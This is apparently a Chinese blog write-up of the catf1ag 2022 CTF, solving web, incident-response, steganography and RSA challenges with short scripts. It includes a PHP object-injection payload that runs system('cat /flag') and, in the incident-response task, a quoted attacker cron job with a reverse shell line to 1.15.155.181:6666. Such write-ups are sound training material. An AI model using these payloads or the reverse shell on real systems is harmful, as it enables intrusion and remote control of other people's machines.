catf1ag ctf 2022 两小时ak wp

最新推荐文章于 2024-04-26 21:58:37 发布
最新推荐文章于 2024-04-26 21:58:37 发布
阅读量857 收藏 2
点赞数 2
分类专栏: wp 文章标签: web安全 安全 php ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/124686138
版权

catf1ag ctf 2022 两小时ak wp

中午12:50到14:40差一道ak。。。。。。。。

WEB - 签到了!!!你会玩2048么?

在这里插入图片描述

WEB - easy_unser

O:7:"catf1ag":2:{s:6:"target";s:29:"<?php system("cat /flag"); ?>";}

PWN/ATTACK - 查杀

catf1ag{异常IP - shell文件名 - php后门文件的连接密码 - 新增的可疑用户名}
先看定时的shell文件
cat /etc/cr*
* * * * * /bin/bash /var/cache/apt/archives/partial/she11.sh看到如下文件之后cat一下
bash -i >& /dev/tcp/1.15.155.181/6666 0>&1
php后门在/var/www/html/9里面找一下就可以
用户名直接cat /etc/passwd就可以看到hacker_v的用户
最后flag为catf1ag{1.15.155.181-she11.sh-cat_f1ag_666-hacker_v}

MISC - 签签

hexeditor打开发现最后是base64,解密就行
Y2F0ZjFhZyU3QmNjMDIwNjFlLWM4OGQtMTFlYy1iZWRiLTJjZjA1ZDk1NTQ1NSU3RA==
catf1ag{cc02061e-c88d-11ec-bedb-2cf05d955455}

MISC - 奇怪的字符

打开之后是这么一样东西bcwb4g`slyLMb?ftR~qh,记得之前有次比赛就有类似的东西,试了一下异或之后发现失败了,就那试一下异或变异

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m', end='')

z1r0 = open('secret.txt','r').read()

j = 1
for i in z1r0:
    li(chr(ord(i) ^ j))
    j += 1

MISC - 这4什么好看的

4应该就是和密码有关的
下载之后是一张图片,lsb各种各样的隐写都试了一下,最后试了一下steghide隐写发现成功了。

#!/bin/bash

ip_start=1
ip_end=9999

for((i=$ip_start; i < $ip_end; i++));
do
	steghide extract -sf z1r0.jpeg -p $i
done

catf1ag{198591b0-cbb0-11ec-bae7-2cf05d955455}

CRYPTO - 怎么会多一个呢

rsa的老套路了。。。t利用yafu分解n然后直接拿之前的脚本用一下就可以了

import libnum
import gmpy2

n=73551482761993440116378276402850976017673970117685879384712768054097267028974244867004238587658366463106703581107613883463180833706377915593443986550610497954246664378469651
e=65537
c=19088340804936031145050310701046663800140062626102387290922890724239533128878474005542684734507475562997222905703018409354867816494925059525377106444000231776165581716296665

p = 4254843227
q = 2492374307
r = 6935768738605665705725288400892432256194550668863095515013942769049162888322407038880737120756913240675144540329112141837524407303580284917764285456453059
f = (p-1) * (q-1) * (r-1)
d = gmpy2.invert(e, f)
m = pow(c, d, n)
print(libnum.n2s(int(m)))

在这里插入图片描述

CRYPTO - 高实在是高

n=12665183429254325580945372911206360706257079006954643947743121664454914089524916634832685040737214233687785325112424576039016165508146660290974828802710996880849185068704144690143915135774197938764858051298755021664568772363301699454954045374224914126975984844824184263131757665633324767483926757913457691303836308728657455890530401047029807132954324528617558308552469993676230342998368641468028935159530808062712526662606628371783359397956992056631816818089093174030024770769185589578769480295675152580623898653766068001693142399972844934629828827684074705324777912603273764730083438485014417283937379823019721736119
e=3
c=757846665709612710047622798901607696475966191486157677993807167873384365513676489731461790205050172225086169489914035089956311182880536480621453222154862896612205436092262339764782754486059223792491004753337631375452744373859969281558865685434771438386779285599911963081936786091339632323042550461240292308997539607661877861
high_m=911717829801678618100911351591485103708233783320853921932061644898078088242070960582223500287266227352502272

high_m都给我们了那肯定就是m高位攻击。
本地没有这个环境,所以笔者直接在在线网站上运行了脚本。不会m高位攻击?上网随便拿个脚本就好了。
在这里插入图片描述

import binascii
def hexStr_to_str(hex_str):
    hex = hex_str.encode('utf-8')
    str_bin = binascii.unhexlify(hex)
    return str_bin.decode('utf-8')
def phase2(high_m, n, c):
    R.<x> = PolynomialRing(Zmod(n), implementation='NTL')
    m = high_m + x
    M = m((m^3 - c).small_roots()[0])
    print(hexStr_to_str(hex(int(M))[2:]))

n=12665183429254325580945372911206360706257079006954643947743121664454914089524916634832685040737214233687785325112424576039016165508146660290974828802710996880849185068704144690143915135774197938764858051298755021664568772363301699454954045374224914126975984844824184263131757665633324767483926757913457691303836308728657455890530401047029807132954324528617558308552469993676230342998368641468028935159530808062712526662606628371783359397956992056631816818089093174030024770769185589578769480295675152580623898653766068001693142399972844934629828827684074705324777912603273764730083438485014417283937379823019721736119
e=3
c=757846665709612710047622798901607696475966191486157677993807167873384365513676489731461790205050172225086169489914035089956311182880536480621453222154862896612205436092262339764782754486059223792491004753337631375452744373859969281558865685434771438386779285599911963081936786091339632323042550461240292308997539607661877861
high_m=911717829801678618100911351591485103708233783320853921932061644898078088242070960582223500287266227352502272

phase2(high_m, n, c)

CRYPTO - 栓q

在这里插入图片描述
16进制解密只有前一部分。
vim打开的时候会发现<200c>这些东西,Unicode Steganography with Zero-Width Characters,用这个解密即可。
catf1ag{f4ef7dd6-cda1-11ec-860b-2cf05d955455}

WEB - 你猜猜是什么注入?

时间到

z1r0.
关注
专栏目录
catf1ag 小时ak
zip471642048的博客
05-09 800
目录Crypto[小时AK赛] - CRYPTO - 怎么会多一个呢[小时AK赛] - CRYPTO - 高实在是高[小时AK赛] - CRYPTO - 栓qMisc[小时AK赛] - MISC - 签签[小时AK赛] - MISC - 奇怪的字符[小时AK赛] - MISC - 这4什么好看的 Crypto [小时AK赛] - CRYPTO - 怎么会多一个呢 yafu分解n可以分解出三个因子 import libnum import gmpy2 n=73551482761993440
catf1ag Web writeup(wp) 可能会持续更新
m0_54850952的博客
02-22 311
文章目录 命令执行之我在干什么 签到题 webshell 无字符webshell int 命令执行 《我的女友是机器人》 变量覆盖_extract 等于False 啥都没了 文件包含 strcmp easy_serialize 什么?有后门 easy_js get_file 命令执行之我是谁 secret_key easy_flask 小矛盾 where is flags? random_flag xxelab_1 CGI xxelab2 urldecode 命令执行之我在哪 ENV 命
catf1ag CTF 小时AK赛 Crypto writeup
qq_39492081的博客
05-11 694
目录 怎么会多一个呢 高实在是高 栓q 怎么会多一个呢 factordb分解出来三个结果,不过原理还是相同,根据欧拉函数的定义,此时 python脚本 from Crypto.Util.number import * n = 735514827619934401163782764028509760176739701176858793847127680540972670289742448670042385876583664631067035811076138834631808
Catf1ag小时AK
Pai_Space
05-21 282
1.[小时AK赛] - WEB - 签到了!!!你会玩2048么? 找到源码判断,找到 flag [小时AK赛] - MISC - 签签 catf1ag%7Bcc02061e-c88d-11ec-bedb-2cf05d955455%7D URL catf1ag{cc02061e-c88d-11ec-bedb-2cf05d955455} [小时AK赛] - MISC - 这4什么好看的 jpeg 图,查隐写 排除几个 .
小时AK
shinygod的博客
05-10 329
WEB - 签到了!!!你会玩2048么? main.js WEB - easy_unser __wakeup可以把序列化后的属性个数改一下就可以绕过了。 ?catf1ag=O:7:"catf1ag":2:{s:6:"target";s:26:"<?php include('/flag'); ?>";} MISC - 签签 base64解码一下就可以了 WEB - 你猜猜是什么注入? 经测试cat,/,|,tee可以用,虽然页面不能回显,但是我们可以把结果保存到文件中。 ?catf1ag=
catf1ag [小时AK赛] - WEB - easy_unser
weixin_56051888的博客
05-12 671
<?php //flag in /flag show_source('./index.php'); class catf1ag{ public $target='flag'; function __wakeup(){ $this->target = "catf1ag is CTF platform!"; } function __destruct(){ $fp = fopen("catf1ag.php","w"); ...
catf1ag 小时AK赛 PWN/ATTACK 查杀总结应急响应常用命令指南
Aiwin的博客
05-12 812
catf1agAK赛中PWN总结一下应急响应的常用命令。
天权信安杯 catf1ag CTF 2022 题目
12-09
天权信安杯 catf1ag CTF 2022 题目。除了Web,其他类型的题目基本上都下载了。
catf1ag misc writeup
zip471642048的博客
12-05 1037
lsb看了都说big 题目是lsb隐写加steghide加密 zsteg 1.jpg -a 发现b1,rgba,msb,yx存在base64形式的图片 可以利用lsb脚本进行提取 然后用浏览器打开 然后其实这个题目就提示了是lsb隐写密码是big只不过很难看出 steghide extract -sf 3.jpg -p big flag{reward_yourself} ...
catf1ag CTF [小时AK赛] - MISC - 签签
weixin_56051888的博客
05-10 566
1、将图片下载下来 2、将图片在winhex中打开 观察到后面出现比较特殊的字符串,类似base64加密(Y2F0ZjFhZyU3QmNjMDIwNjFlLWM4OGQtMTFlYy1iZWRiLTJjZjA1ZDk1NTQ1NSU3RA==) 3、将字符串复制到解码器解码(Base64在线加密解密-在线Base64加密解密工具-Base64编码解码工具) ...
[小时AK赛] - WEB - 你猜猜是什么注入?
weixin_56051888的博客
05-12 927
尝试了union注入、报错注入等都没成功...最后想到用Linux命令 先学习一下Linux命令: 一、Linux命令——ls列出目录下的内容 ls 命令为英文单词 list 的缩写,正如英文单词 list 的意思,其功能是列出指定目录下的内容及其相关属性信息。 1、列出所有文件(包括隐藏文件):[root@linuxliangxu ~]# ls -a 2、列出文件的详细信息: [root@linuxliangxu ~]# ls -l 3、列...
[小时AK赛] - MISC - 签签
MrTreebook的博客
05-10 266
[小时AK赛] - MISC - 签签1.winhex打开2.base64解码 1.winhex打开 2.base64解码
Catf1agCTF-Web通关合集,网络安全高级工程师必备知识
m0_56169789的博客
04-05 708
?
Catf1agCTF-Web通关合集,网络安全插件化主流框架和实现原理
2401_84160272的博客
04-09 859
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
Catf1agCTF——Web(刷题记录片)
最新发布
weixin_62074861的博客
04-26 520
Catf1agCTF——Web
catf1ag平台AK
weixin_53268624的博客
05-10 920
catf1ag AKwp
catf1ag CTF刷题1(比较入门)
weixin_63231007的博客
05-09 951
1. 变量覆盖_extract _extract函数存在变量覆盖,因此再get传入_init_str=6即可满足条件 2. 等于False md5()函数存在漏洞,传入为数组时,会报错返回NULL值,满足==0 3. 啥都没了 主机关机了,以为啥都没了,没想到。。。肯定是备份考察 index.php.bak index.php.swp 发现.index.php.swp下载的文件里flag 4. 文件包含 题目说了是文件包含漏洞。发现?file=参数,查看源码得知flag所在文件.
catf1ag平台 友谊杯
weixin_53268624的博客
07-14 1145
catf1ag平台友谊杯
ctfshow WEB AK
LYJ20010728的博客
06-14 4654
WEB AK赛签到_观己考点思路Payloadweb1_观字考点思路Payloadweb2_观星考点思路Payloadweb3_观图考点思路Payloadweb4_观心考点思路Payload 签到_观己 考点 文件包含 思路 盲猜一波flag在根目录下,所以直接读取试试 Payload 源码 <?php if(isset($_GET['file'])){ $file = $_GET['file']; if(preg_match('/php/i', $file)){
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值